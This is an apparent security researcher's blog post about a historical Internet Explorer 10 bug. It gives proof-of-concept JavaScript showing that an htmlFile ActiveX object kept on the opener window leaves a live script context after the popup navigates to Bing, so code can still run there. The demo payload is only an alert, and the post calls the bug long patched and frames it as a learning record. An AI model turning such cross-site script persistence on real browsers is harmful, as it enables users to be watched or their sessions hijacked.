IE10 Resident Script via ActiveX htmlFile

While exploring variations of the embed-based persistence technique, I found a completely different approach using the htmlFile ActiveX object. Creating an htmlFile instance in a new window and storing the reference in the opener before navigating away leaves a live script context that survives navigation — a technique that had appeared in earlier IE versions but had reportedly been patched.

function main() {
    var win = window.open("about:blank");
    win.execScript('opener.ax = new ActiveXObject("htmlFile")');

    win.location = "http://www.bing.com";

    setTimeout('ax.parentWindow.setTimeout("alert(\'Wow! We are on bing but we can still show alerts!\')", 3000)', 2000);
}

The key step is using execScript in the new window to create the htmlFile and store it back on opener (the main window). Once the new window navigates to Bing, ax on the main window still holds a valid reference into an active script context, and ax.parentWindow.setTimeout runs code there. Tested on IE10 Win8 RTM.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [Persistent Keylogger via Embed HTML and createPopup] :: [IE10 UXSS via Injected JavaScript Link] >